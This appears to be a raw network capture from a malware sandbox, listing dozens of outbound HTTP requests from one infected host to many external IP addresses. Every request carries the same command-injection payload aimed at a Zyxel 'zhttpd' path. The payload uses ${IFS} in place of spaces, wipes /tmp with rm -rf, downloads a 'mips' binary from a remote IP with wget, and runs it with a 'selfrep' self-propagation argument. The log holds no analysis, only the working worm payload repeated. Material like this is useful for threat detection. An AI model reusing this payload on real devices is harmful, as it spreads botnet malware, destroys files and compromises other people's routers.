                              Mar 31, 2024 08:42:01.271929026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8011192.168.2.1345010174.174.115.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.271972895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8012192.168.2.1348490145.100.199.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272006989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8013192.168.2.1350320222.209.124.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272062063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8014192.168.2.1357894165.12.185.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272130966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8015192.168.2.13387642.100.62.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272161961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8016192.168.2.1359784153.219.2.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272178888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8017192.168.2.1338034153.212.151.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272223949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8018192.168.2.1344624137.42.134.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272288084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8019192.168.2.1354402205.225.180.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272336006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8020192.168.2.1337842183.121.207.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272380114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8021192.168.2.1348670216.123.46.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272413015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8022192.168.2.13545982.124.40.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272464991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8023192.168.2.1347128100.212.105.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272476912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8024192.168.2.1346636177.193.83.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272535086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8025192.168.2.134522887.225.187.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272567034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8026192.168.2.1342572175.149.45.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272629023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8027192.168.2.134080241.1.119.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272660971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8028192.168.2.13385742.229.168.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272722006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8029192.168.2.1339400201.78.101.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272787094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8030192.168.2.1342230123.194.167.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272798061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8031192.168.2.1357196134.190.22.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272823095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8032192.168.2.1360684110.64.233.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272890091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8033192.168.2.133965444.236.70.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272917032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8034192.168.2.1335116162.161.125.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.272958994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8035192.168.2.1355176194.200.163.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273010015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8036192.168.2.135091647.50.48.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273037910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8037192.168.2.1359504145.212.164.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273072004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8038192.168.2.13445248.45.199.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273114920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8039192.168.2.1342100121.67.252.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273179054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8040192.168.2.1354614106.126.188.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273214102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8041192.168.2.1360580150.156.8.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273250103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8042192.168.2.133385813.127.233.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273299932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8043192.168.2.1350080188.122.225.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273364067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8044192.168.2.135541235.37.127.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273411036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8045192.168.2.133517638.117.116.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273448944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8046192.168.2.134529486.16.81.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273466110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8047192.168.2.1336192200.112.90.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273523092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8048192.168.2.1336390198.78.27.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273545980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8049192.168.2.1339602188.237.155.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273606062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8050192.168.2.1333028160.61.235.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273637056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8051192.168.2.1350084179.240.250.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273659945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8052192.168.2.1338486213.243.119.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273744106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8053192.168.2.135648027.192.117.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273792028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8054192.168.2.133371213.222.240.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273849964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8055192.168.2.133812636.167.169.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273876905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8056192.168.2.1347712105.81.185.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273922920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8057192.168.2.1355532159.156.62.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.273963928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8058192.168.2.1353310175.231.215.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274033070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8059192.168.2.1335340135.31.118.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274068117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8060192.168.2.134201474.123.30.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274121046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8061192.168.2.135741234.190.60.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274152994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8062192.168.2.1336058212.180.114.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274194956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8063192.168.2.1345008140.36.14.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274251938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8064192.168.2.1357946156.155.79.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274279118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8065192.168.2.1344382168.93.74.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274352074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8066192.168.2.1348996198.68.14.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274388075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8067192.168.2.1339612187.237.81.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274447918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8068192.168.2.1353752132.108.205.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274477959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8069192.168.2.1343878209.175.127.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274525881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8070192.168.2.1348010125.174.67.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274570942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8071192.168.2.1356888216.167.177.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274602890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8072192.168.2.1357318195.92.75.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274657965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8073192.168.2.135626675.36.80.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274729013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8074192.168.2.1335226167.121.29.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274765015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8075192.168.2.135810218.52.154.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274821043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8076192.168.2.1334672187.204.236.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274880886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8077192.168.2.1349474195.188.98.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274909019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8078192.168.2.1351478177.24.223.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.274982929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8079192.168.2.1348632132.200.61.242443
                              TimestampBytes transferredDirectionData
